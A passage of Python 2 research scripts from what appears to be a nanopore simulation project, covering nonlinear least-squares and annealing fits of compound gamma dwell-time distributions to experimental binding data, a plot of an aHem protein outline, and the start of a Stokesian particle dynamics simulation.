return np.array([ddf(theta, xi, yi, 1., [1,0,0]),
ddf(theta, xi, yi, 1., [0,1,0]),
ddf(theta, xi, yi, 1., [0,0,1])])
theta = np.array([w0, np.log(t10), np.log(t20)])
dftheta = df(theta, xi, yi)
while np.linalg.norm(dftheta) > tol:
print "|(grad f)(theta)|", np.linalg.norm(dftheta)
theta -= np.linalg.solve(Jf(theta, xi, yi), dftheta)
dftheta = df(theta, xi, yi)
return theta[0], np.exp(theta[1]), np.exp(theta[2])
def NLS_general(F, xi, yi, p0=1., tol=1e-12):
"nonlinear least squares to fit arbitrary f with any number of parameters"
# F = F(x, p), p0 MUST match len(p), F takes array of x
# F must be compatible with tangent module
def f(p, xi, yi):
return np.sum((F(xi, p) - yi)**2)
# minimize f by solving df(x) = 0 with newton method
n = len(p0)
df = tangent.grad(f)
ddf = tangent.grad(df, mode="forward")
ei = lambda i: np.eye(1, n, i)[0, :]
def Jf(p, xi, yi):
return np.array([ddf(p, xi, yi, 1., ei(i)) for i in range(n)])
p = np.array(p0)
dfp = df(p, xi, yi)
while np.linalg.norm(dfp) > tol:
print "|grad f|", np.linalg.norm(dfp)
p -= np.linalg.solve(Jf(p, xi, yi), dfp)
dfp = df(p, xi, yi)
return tuple(p)
def NLS_bruteforce(F, xi, yi, p, width=1., N=100):
# make p 1d array
p = np.atleast_1d(p)
# create parameter range
# TODO: this currently only applies to len(p)==2
x = np.logspace(-width, width, N)
xx = np.column_stack((np.repeat(x[:, None], len(x), 0),
np.tile(x[:, None], [len(x), 1])))
pp = p[None, :] * xx
f = np.sum((F(xi[None, :], pp) - yi)**2, 1)
i = np.argmin(f)
print "minimum:", f[i]
print "parameters:", pp[i, :]
return tuple(pp[i, :])
def NLS_annealing(F, xi, yi, p, N=100, n=10, sigma=5.,factor=0.5):
# N = size of population in one iteration
# n = number of iterations
# sigma = initial (multiplicative) standard deviation
# factor = factor to reduce sigma per iteration
print "initial", p
p = np.atleast_1d(p)
dim = len(p)
# make initial sigma act like multiplication by sigma^(+-1)
sigma = np.log(sigma)*np.ones(dim)
for k in range(n):
# create new population by adding multiplicative gaussian noise
P = p[None, :] * np.exp(np.random.randn(N, dim) * sigma[None, :])
# compute mean square loss on population
f = np.mean((F(xi[None, :], P) - yi)**2, 1)
# replace p by new best guess
p = P[np.argmin(f), :]
# update sigma
sigma *= factor
print "parameters:", p
print "minimum", min(f)
return tuple(p)
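# Usage sketch for NLS_annealing (illustrative): fit shape and scale of a plain
# gamma cdf to a hypothetical empirical cdf (xi, yi), starting from a rough guess p, e.g.
# K, tau = NLS_annealing(lambda t, p: sp.stats.gamma.cdf(t, p[:, 0:1], scale=p[:, 1:2]),
#                        xi, yi, p=(2., 1.), N=100, n=20)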
def fit_gamma(ti):
mu = ti.mean()
sigma = ti.std()
C = mu**2/sigma**2
def f(x):
return np.exp(x)/(2.*np.expm1(x)/x - 1.)
def f1(x):
y = 2.*np.expm1(x)/x - 1.
z = 2./x**2*(x*np.exp(x) - np.expm1(x))
return np.exp(x)*(1 - z/y)/y
# newton solve
K = 2.*C # initial value
#print "Newton iteration:"
for i in range(10):
dK = -(f(K) - C)/f1(K)
K = K + dK
# print i, "Residual", f(K) - C, "Value K =", K
#print
tau = mu*(1. - np.exp(-K))/K
return K, tau
from scipy.special import iv
class CompoundGamma(object):
def __init__(self, ti):
self.ti = ti
self.K, self.tau = self.fit_brute(ti)
def fit_todo(self, ti, n=40):
pass
def fit_naive(self, ti):
return fit_gamma(ti)
def fit_brute(self, ti, n=100):
# first guess to get orders of magnitude right
p = np.array(fit_gamma(ti))
# define problem # TODO:
#xi = np.sort(ti)[int(len(ti)/n/2)::int(len(ti)/n)]
#yi = np.arange(len(xi))/float(len(xi))
bins = np.logspace(np.log10(min(ti)), np.log10(max(ti)), n)
hist, _ = np.histogram(ti, bins=bins)
xi = 0.5*(bins[:-1] + bins[1:])
yi = np.cumsum(hist)/float(np.sum(hist))
# minimize
#K, tau = NLS_bruteforce(self.cfd_vec, xi, yi, p, width=1., N=100)
K, tau = NLS_annealing(self.cfd_vec, xi, yi, p, N=100, n=20)
return K, tau
def pdf_direct(self, tt, N=50):
a = self.K
t = tt/self.tau
S = np.ones_like(t)
s = np.ones_like(t)
for k in range(1, N):
s *= (a*t)/(k*(k+1.))
S += s
return np.exp(-t)*a/np.expm1(a) * S /self.tau
def pdf_bessel(self, tt):
a = self.K
t = tt/self.tau
return np.exp(-t)*np.sqrt(a/t)*iv(1., 2.*np.sqrt(a*t))/self.tau/np.expm1(a)
def cdf(self, tt, N=50):
a = self.K
tau = self.tau
gamma = sp.stats.gamma.cdf
S = np.zeros_like(tt)
s = 1.
for k in range(1, N):
s *= a/k
S += s*gamma(tt, k, scale=tau)
return 1./np.expm1(a) * S
def cfd_vec(self, tt, p, N=50):
# cdf that takes parameter as vector input, for fitting
a = p[:, 0:1]
tau = p[:, 1:2]
gamma = sp.stats.gamma.cdf
S = np.ones((p.shape[0], tt.shape[1]))
s = np.ones((1, tt.shape[0]))
for k in range(1, N):
s = s*a/k
S = S + s*gamma(tt, k, scale=tau)
return 1./np.expm1(a) * S
def gammainc(self, tt, k,tau):
# TODO: can not differentiate wrt k
# implement fitting yourself
#for j in range(k):
pass
class Compound2Gamma2(CompoundGamma):
"fit one or two compound^2 gammas with possibly cut off events"
def __init__(self, ti, ta=None, n_gammas=1, cutoff=False, use_ta_model=True):
self.ti = ti
self.n_gammas = n_gammas
self.cutoff = cutoff
# fitting of gamma (bind time) parameters
if ta is None:
# fit parameters tau, na, ga = ka*taua directly
# deduce ka for any given choice of taua
pass
else:
if use_ta_model:
# first fit attempt times to get na, taua,
# then fit bind times for tau, ga and deduce ka = ga/taua
pass
else:
# just simulate gamma-poisson distributed bind-times by drawing
                # poisson/exp random numbers in forward mode, creating a
# simulated cdf to be matched with the experimental one
pass
self.fit(ti)
def fit(self, ti):
pass
def pdf_direct(self, tt, N=50):
# g = ka * taua
# q = g / (1 + g)
# P(N>0) = (1 - np.exp(-qa))
# P(N=n) = np.exp(-a) q**n/n! * Sk
# Sk = sum_k>=1 1/k!(n+k-1)!/(k-1)! (1-q)**k a**k
# f(t)* = np.exp(-t)/P(N>0) sum_n>=1 t**(n-1)/(n-1)! P(N=n)
# F(t)* = 1/P(N>0) sum_n>=1 Gamma(n,t) P(N=n)
pass
def cdf(self, tt, N=50):
pass
def pn_vec(self, n, ka, taua=None, na=None):
# ka = association rate in binding zone
# taua, na = parameters of attempt time distribution, determined by
# simulations
if taua is None:
taua = self.taua
if na is None:
na = self.na
#n = np.arange()
def cdf_vec(self, tt, p, N=50):
# cdf that takes parameter as vector input, for fitting
a = p[:, 0:1]
tau = p[:, 1:2]
gamma = sp.stats.gamma.cdf
S = np.ones((p.shape[0], tt.shape[1]))
s = np.ones((1, tt.shape[0]))
for k in range(1, N):
s = s*a/k
S = S + s*gamma(tt, k, scale=tau)
return 1./np.expm1(a) * S
if todo.plot_distribution:
N = 10000
params0 = dict(params, N=N)
rw = randomwalk.get_rw(NAME, params0, setup=setup_rw)
ta = rw.attempt_times
ta1 = ta[ta > 0.]
tmean = ta1.mean()
bins = np.logspace(np.log10(min(ta1)), np.log10(max(ta1)), 35)
#bins = np.logspace(-3., 2., 35)
hist, _ = np.histogram(ta1, bins=bins)
cfd = np.cumsum(hist)/float(np.sum(hist))
t = 0.5*(bins[:-1] + bins[1:])
#n = 100
#t = np.sort(ta1)[int(len(ta1)/n/2)::int(len(ta1)/n)]
#cfd = np.arange(len(t))/float(len(t))
plt.figure("ta_cfd", figsize=(4,3))
tt = np.logspace(np.log10(min(ta1)), np.log10(max(ta1)), 100)
plt.semilogx(t, cfd, "v", label="Simulations")
# naive exp. fit
#plt.semilogx(tt, 1. - np.exp(-tt/tmean), label="Simple exp. fit")
# proper exp. fit
toff = NLS(t, cfd, t0=tmean)
#plt.semilogx(tt, 1. - np.exp(-tt/toff), label="Exp. fit")
# ML gamma fit
#K, _, tau = sp.stats.gamma.fit(ta1)
K = (tmean/ta1.std())**2
tau = tmean/K
#plt.semilogx(tt, sp.stats.gamma.cdf(tt, K, scale=tau), label="Simple Gamma fit")
gamma = CompoundGamma(ta1)
plt.semilogx(tt, gamma.cdf(tt), label="Compound Gamma fit")
# double exponential fit
#w, toff1, toff2 = NLS2(t, cfd, t10=toff/2., t20=toff*2., w0=.4)
#plt.semilogx(tt, 1. - w*np.exp(-tt/toff1) - (1.-w)*np.exp(-tt/toff2),
# label="Double exp. fit")
plt.xlabel("Attempt time [ns]")
plt.ylabel("Cumulative frequency")
plt.xlim(xmin=1.)
plt.legend()
xlog = False
plt.figure("ta_hist", figsize=(4,3))
#tt = np.logspace(-1, 4., 20)
bins = np.linspace(0., 200., 30)
tt = np.linspace(0., 200., 300)
plt.figure("ta_hist", figsize=(4,3))
plt.hist(ta1, bins=bins, normed=True, log=False, label="Simulations")
#tt0 = tt if xlog else 1.
#plt.plot(tt, tt0/tmean * np.exp(-tt/tmean),
# label="Simple exp. fit, mean=%.3gns" % tmean)
#plt.plot(tt, tt0/toff * np.exp(-tt/toff),
# label="Exp. fit, mean=%.3gns" % toff)
#dt = rw.dt
#kk = np.arange(1000)
#k0 = tmean/dt
#plt.plot(tt, sp.stats.gamma.pdf(tt, K, scale=tau),
# label="Simple Gamma fit")
plt.plot(tt, gamma.pdf_direct(tt), label="Compound Gamma fit")
#plt.plot(tt, gamma.pdf_bessel(tt), ".k", label="Compound Gamma fit")
#plt.plot(kk*dt, poisson.pmf(kk, k0), label="Poisson fit")
#plt.plot(tt)
if xlog:
plt.xscale("log")
#plt.ylim(ymin=1e-10)
#plt.yscale("log")
plt.xlabel("Attempt time [ns]")
plt.ylabel("Rel. frequency")
plt.legend()
if todo.fit_experiments:
# get data
drop, tsample = fields.get("events_pugh_experiment", "drop", "t")
tsample = tsample.load()
log = True
std = False
cutoff = 0.1 # [ms], detection limit cutoff
# plot data with indication of two clusters
sep = 2.
large = tsample >= sep
toosmall = tsample < cutoff
plt.figure("data_scatter", figsize=(4, 3))
plt.scatter(tsample[toosmall], drop[toosmall], color="r")
plt.scatter(tsample[~toosmall], drop[~toosmall])
#plt.scatter(tsample[~large & ~toosmall], drop[~large & ~toosmall])
#plt.scatter(tsample[large], drop[large], color="g")
plt.axvline(x=cutoff, color="r")
plt.xscale("log")
plt.xlabel(r"$\tau$ off [ms]")
plt.ylabel(r"$A/I_0$ [%]")
# cut off data at detection limit threshold
tsample = tsample[~toosmall]
# fit with different methods and compare
T = statistics.LeftTruncatedExponential(tau=None, tmin=cutoff)
T2 = statistics.LeftTruncatedDoubleExponential(
tau1=None, tau2=None, w=None, tmin=cutoff)
T.fit(tsample, method="cdf", log=True, sigma=2., factor=0.9, n_it=50)
T2.fit(tsample, method="cdf", log=True, sigma=2., factor=0.9, n_it=50)
t = statistics.grid(tsample, 15, 0, log=log)
tt = statistics.grid(tsample, 100, 0, log=log)
ecdf = statistics.empirical_cdf(t, tsample)
t1 = statistics.grid(tsample, 15, 0, log=log)
tc, epdf = statistics.empirical_pdf(t1, tsample, log=log)
plt.figure("data_fit_cdf", figsize=(4, 3))
plt.plot(t, ecdf, "o", label="Experiment")
T.plot_cdf(tt, label="Truncated exp. fit", std=std)
T2.plot_cdf(tt, ":", label="Trunc. double exp. fit", std=std)
plt.xscale("log")
plt.ylabel("Cumulative probability")
plt.xlabel(r"$\tau$ off [ms]")
plt.legend(frameon=False)
print "CDF fit:", T2
#T.fit(tsample, method="pdf", log=True, sigma=2., factor=0.9, n_it=50)
#T2.fit(tsample, method="cdf", log=True, sigma=2., factor=0.9, n_it=50)
plt.figure("data_fit_pdf", figsize=(4, 3))
#plt.plot(tc, epdf, "o")
plt.bar(tc, epdf, 0.8*np.diff(t1), alpha=0.5, label="Experiment")
#T.plot_pdf(tt, "C1", log=log, label="Truncated exp. fit")
T2.plot_pdf(tt, ":C2", log=log, label="Trunc. double exp. fit", std=std)
plt.xscale("log")
plt.ylabel("Rel. frequency")
plt.xlabel(r"$\tau$ off [ms]")
plt.legend(loc="upper right", frameon=False)
#print "PDF fit:", T2
if todo.fit_long:
# now we focus only on the long-time cluster and fit that with different methods
drop, tsample = fields.get("events_pugh_experiment", "drop", "t")
tsample = tsample.load()
log = True
std = False
cutoff = 2. # [ms]
sep = 2.
large = tsample >= sep
toosmall = tsample < cutoff
plt.figure("data_scatter_long", figsize=(4, 3))
plt.scatter(tsample[toosmall], drop[toosmall], color="r")
plt.scatter(tsample[~toosmall], drop[~toosmall])
#plt.scatter(tsample[~large & ~toosmall], drop[~large & ~toosmall])
#plt.scatter(tsample[large], drop[large], color="g")
plt.axvline(x=cutoff, color="r")
plt.xscale("log")
plt.xlabel(r"$\tau$ off [ms]")
plt.ylabel(r"$A/I_0$ [%]")
# cut off data at detection limit threshold
tsample = tsample[~toosmall]
# fit with different methods and compare
T = dict()
T["exp"] = statistics.Exponential(tau=None)
T["truncexp"] = statistics.LeftTruncatedExponential(tau=None, tmin=cutoff)
#K = statistics.ZeroTruncatedPoisson(a=None)
#T["compoundgamma"] = statistics.Gamma(tau=None, K=K)
for k in T:
T[k].fit(tsample, method="cdf", log=True, sigma=2., factor=0.9, n_it=50)
t = np.logspace(-0.2, 2.3, 18)
tt = np.logspace(-0.2, 2.3, 100)
#t = statistics.grid(tsample, 15, 0, log=log)
#tt = statistics.grid(tsample, 100, 0, log=log)
ecdf = statistics.empirical_cdf(t, tsample)
#log = False
#t1 = statistics.grid(tsample, 8, 0, log=log)
t1 = np.logspace(np.log10(2.), 2.3, 10)
tt1 = np.logspace(np.log10(2.), 2.3, 100)
tc, epdf = statistics.empirical_pdf(t1, tsample, log=log)
plt.figure("data_long_fit_cdf", figsize=(4, 3))
plt.plot(t, ecdf, "o", label="Experiment (> 2ms)")
T["exp"].plot_cdf(tt, std=std, label="Exponential fit")
T["truncexp"].plot_cdf(tt, ":", std=std, label="Truncated exp. fit")
#T["compoundgamma"].plot_cdf(tt, "--", std=std, label="Compound Gamma fit")
plt.xscale("log")
plt.ylabel("Cumulative probability")
plt.xlabel(r"$\tau$ off [ms]")
plt.legend(frameon=False)
print "CDF fit:", T
plt.figure("data_long_fit_pdf", figsize=(4, 3))
plt.bar(tc, epdf, 0.8*np.diff(t1), alpha=0.5, label="Experiment (> 2ms)")
#T["exp"].plot_pdf(tt1, "C1", label="Exponential fit", log=log, std=std)
T["truncexp"].plot_pdf(tt1, ":C2", label="Truncated exp. fit", std=std, log=log)
#T["compoundgamma"].plot_pdf(tt, "--C3", label="Compound Gamma fit", std=std, log=log)
plt.xscale("log")
plt.xlim(xmin=1.5)
plt.ylabel("Rel. frequency")
plt.xlabel(r"$\tau$ off [ms]")
plt.legend(loc="lower center")
if todo.fit_long_gamma:
# now we focus only on the long-time cluster and fit that with different methods
drop, tsample = fields.get("events_pugh_experiment", "drop", "t")
tsample = tsample.load()
log = True
std = False
cutoff = 2. # [ms]
sep = 2.
large = tsample >= sep
toosmall = tsample < cutoff
plt.figure("data_scatter_long", figsize=(4, 3))
plt.scatter(tsample[toosmall], drop[toosmall], color="r")
plt.scatter(tsample[~toosmall], drop[~toosmall])
#plt.scatter(tsample[~large & ~toosmall], drop[~large & ~toosmall])
#plt.scatter(tsample[large], drop[large], color="g")
plt.axvline(x=cutoff, color="r")
plt.xscale("log")
plt.xlabel(r"$\tau$ off [ms]")
plt.ylabel(r"$A/I_0$ [%]")
# cut off data at detection limit threshold
tsample = tsample[~toosmall]
# get empirical attempt time distribution
N = 10000
params0 = dict(params, N=N)
rw = randomwalk.get_rw(NAME, params0, setup=setup_rw)
ta = rw.attempt_times
ta1 = 1e-9*ta[ta > 0.]
Ta = statistics.Empirical(ta1)
# get cb = 1/Vb
cb = 1./rw.domains[2].Vbind # [M]
# fit with different methods and compare
from collections import OrderedDict
T = OrderedDict()
ka = [1e6, 1e7, 1e8, 1e9]
kastr = [r"$10^{%d}$" % (np.round(np.log10(ka_)),) for ka_ in ka]
kaformat = r"$k_a$ = %s/Ms"
I = range(len(ka))
rvalues = ["66", "99", "cc", "ff"]
linestyles = ["-.", "--", ":", "-"]
colors = ["#%s0000" % r_ for r_ in rvalues]
a_attempts = 4.1 # mean no. attempts for binding site length 8nm
tamean = ta1.mean()
p_binding_prob = OrderedDict()
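# assumed model behind this fit: with association rate ka and local binder concentration
# cb = 1/Vbind, the number of bindings per event is zero-truncated Poisson with (random)
# mean Ra*Ta, Ra = ka*cb, and the total dwell time is a left-truncated gamma with that shape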
for i in I:
Ra = ka[i] * cb
K = statistics.ZeroTruncatedPoisson(a=Ra*Ta)
T[i] = statistics.LeftTruncatedGamma(tau=None, K=K, tmin=cutoff)
p_binding_prob[i] = tamean * Ra / a_attempts
for i in T:
T[i].fit(tsample, method="cdf", log=True, sigma=2., factor=0.6, n_it=20)
ka1 = np.logspace(3.8, 11.2, 20)
T1 = OrderedDict()
error = []
for ka_ in ka1:
Ra = ka_ * cb
K = statistics.ZeroTruncatedPoisson(a=Ra*Ta)
T1[ka_] = statistics.LeftTruncatedGamma(tau=None, K=K, tmin=cutoff)
err = T1[ka_].fit(tsample, method="cdf", log=True, sigma=2., factor=0.6, n_it=20)
error.append(err)
for ka_, err in zip(T1, error):
print T1[ka_].X.K.a.sample(10000).mean(),
print ("%.4g" % ka_),
print err
t = np.logspace(-0.2, 2.3, 18)
tt = np.logspace(-0.2, 2.3, 100)
#t = statistics.grid(tsample, 15, 0, log=log)
#tt = statistics.grid(tsample, 100, 0, log=log)
ecdf = statistics.empirical_cdf(t, tsample)
#log = False
#t1 = statistics.grid(tsample, 8, 0, log=log)
t1 = np.logspace(np.log10(2.), 2.3, 10)
tt1 = np.logspace(np.log10(2.), 2.3, 100)
tc, epdf = statistics.empirical_pdf(t1, tsample, log=log)
plt.figure("data_long_gammafit_cdf", figsize=(4, 3))
##########
for i in T:
#if i==0:
# T[i].plot_cdf(tt, std=std, label=r"$k_a = 10^7$/Ms", color=colors[i])
#else:
T[i].plot_cdf(tt, std=std, label=kaformat % kastr[i],
color=colors[i], linestyle=linestyles[i])
plt.plot(t, ecdf, "o", label="Experiment")
plt.xscale("log")
plt.ylabel("Cumulative probability")
plt.xlabel(r"$\tau$ off [ms]")
plt.xlim(xmin=0.5)
plt.legend(loc="upper left", frameon=False)
print "CDF fit:", T
plt.figure("data_long_gammafit_pdf", figsize=(4, 3))
#########
for i in T:
T[i].plot_pdf(tt, label=kaformat % kastr[i], std=std, log=log,
color=colors[i], linestyle=linestyles[i])
plt.bar(tc, epdf, 0.8*np.diff(t1), alpha=0.5, label="Experiment")
plt.xscale("log")
plt.ylabel("Rel. frequency")
plt.xlabel(r"$\tau$ off [ms]")
plt.xlim(xmin=0.1)
plt.legend(loc="upper left", frameon=False)
plt.figure("data_long_gammafit_error", figsize=(4, 3))
plt.semilogx(ka1, error, "o")
plt.xlabel(r"$k_a$ [M$^{-1}$s$^{-1}$]")
plt.ylabel("Fitting error")
if todo.fit_gamma:
# now fit the full distribution above the detection limit with a mixture of
# short- and long-lived binding populations
drop, tsample = fields.get("events_pugh_experiment", "drop", "t")
tsample = tsample.load()
log = True
std = False
cutoff = 0.1 # [ms]
# cut off data at detection limit threshold
toosmall = tsample < cutoff
tsample = tsample[~toosmall]
# get empirical attempt time distributions
N = 10000
params0 = dict(params, N=N, bind_everywhere=False)
rw1 = randomwalk.get_rw(NAME, params0, setup=setup_rw)
ta1 = 1e-9*rw1.attempt_times
Ta1 = statistics.Empirical(ta1[ta1 > 0.])
cb = 1./rw1.domains[2].Vbind # [M]
params1 = dict(params, N=N, bind_everywhere=True)
rw2 = randomwalk.get_rw(NAME, params1, setup=setup_rw)
ta2 = 1e-9*rw2.attempt_times
Ta2 = statistics.Empirical(ta2[ta2 > 0.])
# fit with different methods and compare
from collections import OrderedDict
T = OrderedDict()
ka = [1e6, 1e7, 1e8, 1e9]
#kastr = [("%.3g" % ka_) for ka_ in ka]
kastr = [r"$10^{%d}$" % (np.round(np.log10(ka_)),) for ka_ in ka]
#kastr = ["$10^6$", "$10^8$", "$10^9$", "$10^{10}$"]
kaformat = r"$k_a$ = %s/Ms"
I = range(len(ka))
rvalues = ["66", "99", "cc", "ff"]*4
linestyles = ["-.", "--", ":", "-"]*4
colors = ["#%s0000" % r_ for r_ in rvalues]
a_attempts = 4.1 # mean no. attempts for binding site length 8nm
tamean = ta1.mean()
p_binding_prob = OrderedDict()
error = []
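# P2(ra): probability of at least one binding per event, 1 - E[exp(-ra*ta)], averaged
# over the empirical attempt times ta2 of the bind-everywhere random walk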
def P2(ra):
colon = slice(None)
n = ra.ndim
#tta = np.random.choice(ta2, size=1000)
tta = ta2
tmp = ra[(colon,)*n + (None,)] * tta[(None,)*n + (colon,)]
tmp = np.exp(-tmp).mean(axis=n)
return 1. - tmp
for i in I:
ka1 = ka[i]
Ra1 = ka1 * cb
a1 = Ra1 * Ta1
p1 = 1 - np.exp(-Ra1*ta1).mean()
ka2 = statistics.Constant(c=None)
ka2.update(c=ka1/30.)
Ra2 = ka2 * cb
a2 = Ra2 * Ta2
#p2 = Ra2 * ta2.mean()
p2 = statistics.Function(P2, Ra2)
w = (1./p1 - 1.) * p2
K1 = statistics.ZeroTruncatedPoisson(a=a1)
K2 = statistics.ZeroTruncatedPoisson(a=a2)
T1 = statistics.LeftTruncatedGamma(K=K1, tau=None, tmin=cutoff)
T2 = statistics.LeftTruncatedGamma(K=K2, tau=None, tmin=cutoff)
# initial guesses to bias fit
T1.X.update(tau=10.)
T2.X.update(tau=0.1)
T[i] = statistics.OneOf(X=T2, Y=T1, w=w)
for i in T:
err = T[i].fit(tsample, method="cdf", log=True, sigma=2., factor=0.8, n_it=40)
error.append(err)
# ka1 = np.logspace(7., 12., 10)
# for ka_ in ka1:
# Ra = ka_ * cb
# K = statistics.ZeroTruncatedPoisson(a=Ra*Ta)
# Ti = statistics.LeftTruncatedGamma(tau=None, K=K, tmin=cutoff)
# err = Ti.fit(tsample, method="cdf", log=True, sigma=2., factor=0.6, n_it=20)
# error.append(err)
t = statistics.grid(tsample, 15, 0, log=log)
tt = statistics.grid(tsample, 100, 0, log=log)
ecdf = statistics.empirical_cdf(t, tsample)
t1 = statistics.grid(tsample, 15, 0, log=log)
tt1 = tt
tc, epdf = statistics.empirical_pdf(t1, tsample, log=log)
plt.figure("data_gammafit_cdf", figsize=(4, 3))
##########
for i in T:
#if i==0:
# T[i].plot_cdf(tt, std=std, label=r"$k_a = 10^7$/Ms", color=colors[i])
#else:
T[i].plot_cdf(tt, std=std, label=kaformat % kastr[i],
color=colors[i], linestyle=linestyles[i])
plt.plot(t, ecdf, "o", label="Experiment")
plt.xscale("log")
plt.ylabel("Cumulative probability")
plt.xlabel(r"$\tau$ off [ms]")
#plt.xlim(xmin=0.5)
plt.legend(loc="lower right", frameon=False)
print "CDF fit:", T
plt.figure("data_gammafit_pdf", figsize=(4, 3))
#########
for i in T:
T[i].plot_pdf(tt, label=kaformat % kastr[i], std=std, log=log,
color=colors[i], linestyle=linestyles[i])
plt.bar(tc, epdf, 0.8*np.diff(t1), alpha=0.5, label="Experiment")
plt.xscale("log")
plt.ylabel("Rel. frequency")
plt.xlabel(r"$\tau$ off [ms]")
#plt.xlim(xmin=0.1)
plt.legend(loc="upper right", frameon=False)
plt.figure("data_gammafit_error", figsize=(4, 3))
plt.semilogx(ka, error, "o")
plt.xlabel(r"$k_a$")
plt.ylabel("Fitting error")
import folders
nanopores.savefigs("rw_cyl", folders.FIGDIR + "/pugh", ending=".pdf")
```
#### File: scripts/random_walk_aHem/plot_aHem.py
```python
import matplotlib.pyplot as plt
import numpy as np
from aHem_array_2d import *
a=np.load('hbond.npy')
def radius(x,y):
return np.sqrt(x**2+y**2)
def det(a,b,c,d):
return a*d-b*c
size=X_aHem_2d.shape[0]
hbond=X_aHem_2d
A=0
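# polygon area A via the shoelace formula; Cx, Cy below form the polygon centroid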
for i in range(size):
A+=(hbond[i-1][0]*hbond[i][1]-hbond[i][0]*hbond[i-1][1])
A*=-0.5
print A
Cx=0
Cy=0
for i in range(size):
Cx+=(hbond[i-1][0]+hbond[i][0])*(hbond[i-1][0]*hbond[i][1]-hbond[i][0]*hbond[i-1][1])
Cy+=(hbond[i-1][1]+hbond[i][1])*(hbond[i-1][0]*hbond[i][1]-hbond[i][0]*hbond[i-1][1])
Cx*=1./(6*A)
Cy*=1./(6*A)
shift=np.array([[Cx,Cy] for i in range(size)])
hbond=hbond+shift
hbond2=hbond*1.2
#hbond=hbond-shift
leftend=10.
x_mem=np.linspace(X_aHem_2d[18][0],leftend,100)
y_mem=np.zeros(x_mem.shape[0])+X_aHem_2d[18][1]
X=np.zeros(size+1)
Y=np.zeros(size+1)
X_=np.zeros(a.shape[0]+1)
Y_=np.zeros(a.shape[0]+1)
for index in range(size):
X[index]=X_aHem_2d[index][0]
Y[index]=X_aHem_2d[index][1]
for index in range(a.shape[0]):
X_[index]=a[index][0]
Y_[index]=a[index][1]
X[size]=X[0]
Y[size]=Y[0]
X_[a.shape[0]]=X_[0]
Y_[a.shape[0]]=Y_[0]
#fig=plt.figure(figsize=(5.7,11), dpi=400)
plt.plot(X,Y,linewidth='2',color='blue')
plt.scatter(X,Y,50,color='blue')
plt.plot(X_,Y_,linewidth=2,color='green')
plt.scatter(X_,Y_,50,color='green')
plt.plot(x_mem,y_mem,color='black',linewidth=1)
#plt.scatter([0.,0.,2.,2.],[0.,-2.,-2.,0.],50,color='red')
#plt.savefig('array.png')
plt.show()
```
#### File: scripts/stokesian/simulation.py
```python
import numpy as np
from nanopores import kT, eta, eperm, qq, rpermw, HOME
from matplotlib import pyplot as plt
#from matplotlib import patches
import matplotlib.animation as animation
from matplotlib import collections
from functools import partial
#import matplotlib
#matplotlib.use("Agg")
class Particle(object):
def __init__(self, x, a, charge=0., color="blue"):
self.x = np.reshape(np.array(x), (-1, 1))
self.a = a
self.circle = None
self.charge = charge
self.color = color
#
# def add_patch(self, ax):
# self.circle = patches.Circle(xy=self.x[::2], radius=self.a)
# ax.add_patch(self.circle)
#
# def patch(self):
# self.circle = patches.Circle(xy=self.x[::2], radius=self.a)
# return self.circle
def move(self, dx):
self.x = self.x + np.array(dx).reshape(-1, 1)
# if self.circle is not None:
# self.circle.center = self.x[::2]
class Plane(object):
def __init__(self, p, n): # outer normal vector and one point on the plane
self.n = np.array(n).reshape(1, 3)
self.p = np.array(p).reshape(1, 3)
def reflect(self, P):
# reflect all points in P downwards that lie above plane
# ("above" is direction of normal vector)
x = np.array([p.x.flatten() for p in P])
# n * (x - p) > 0
excess = np.dot(x - self.p, self.n.T)
above = (excess > 0).flatten()
dx = np.zeros_like(x)
dx[above, :] = (-2.*excess*self.n)[above, :]
for i, p in enumerate(P):
if above[i]:
p.move(dx[i, :])
class Box(object):
# reflect to be inside box
def __init__(self, x0, Lx, Ly, Lz):
ex = np.eye(1, 3, 0)
ey = np.eye(1, 3, 1)
ez = np.eye(1, 3, 2)
x0 = np.array(x0).reshape(1, 3)
self.planes = [Plane(x0, -ex), Plane(x0 + Lx*ex, ex),
Plane(x0, -ey), Plane(x0 + Ly*ey, ey),
Plane(x0, -ez), Plane(x0 + Lz*ez, ez)]
def reflect(self, P):
for plane in self.planes:
plane.reflect(P)
def msqrt(M): # matrix square root
#U, S, V = np.linalg.svd(M)
#return np.dot(U, np.dot(np.diag(np.sqrt(S)), V))
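# the Cholesky factor L satisfies L*L.T == M, which is all that is needed to generate
# Gaussian displacements with covariance proportional to M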
return np.linalg.cholesky(M)
# external force: constant electrical field
def f_extern(p):
#return np.zeros_like(p.x)
a = 0e-14
#b = 1e-26
f = np.zeros_like(p.x)
f[2, :] = -a*p.a**3 #+ b*(p.x[2, :] - 1.)**(-7)
return f
def f_brownian(p):
rand = np.random.randn(*p.x.shape)
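# zero the y-component so the Brownian displacements stay in the x-z plane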
rand[1] = 0.
return rand
def RR(R):
#R = np.reshape(R, (-1, 1))
r = np.linalg.norm(R)
return np.matrix(R * R.T / r**2)
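# pair mobility tensor; the three cases below appear to follow the Rotne-Prager-Yamakawa
# form for unequal spheres, including the usual regularization for overlapping particles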
def mobility_pp(p1, p2): # D/kT
a1 = 1e-9*p1.a
a2 = 1e-9*p2.a
R = 1e-9*p1.x - 1e-9*p2.x
r = np.linalg.norm(R)
I = np.matrix(np.eye(3))
if r <= abs(a1 - a2):
return 1./(6.*np.pi*eta*max(a1, a2)) * I
elif r <= a1 + a2:
A = 0.5*(a1 + a2) - ((a1-a2)**2 + 3.*r**2)**2/(32.*r**3)
B = 3.*((a1-a2)**2 - r**2)**2/(32.*r**3)
return 1./(6.*np.pi*eta*a1*a2) * (A*I + B*RR(R))
else:
a = a1**2 + a2**2
A = 1. + a/(3.*r**2)
B = 1. - a/r**2
return 1./(8.*np.pi*eta*r) * (A*I + B*RR(R))
def mobility_vectorized(P):
# return matrix mobility(pi, pj)_kl where kl are the space coordinates
# P is, at the moment, a list of particle objects
# TODO: needs a pure numerical representation
n = len(P)
M = np.matrix(np.zeros((3*n, 3*n)))
for i, p in enumerate(P):
for j, q in enumerate(P):
M[i::n, j::n] = mobility_pp(p, q)
return M
def mobility(P):
# nice: M is of the form Mijkl = Aij * Ikl + Bij * Rijkl
# where Ikl, Rijkl are easily formed
# obtain vector representations of positions, radii
n = len(P)
a = 1e-9*np.array([p.a for p in P])
x = 1e-9*np.array([p.x.flatten() for p in P])
rr = np.sum((x[:, None, :] - x[None, :, :])**2, 2) + 1e-100
r = np.sqrt(rr)
A = np.zeros_like(r)
B = np.zeros_like(r)
ama = a[:, None] - a[None, :]
apa = a[:, None] + a[None, :]
asq = a[:, None]**2 + a[None, :]**2
case1 = r <= np.abs(ama)
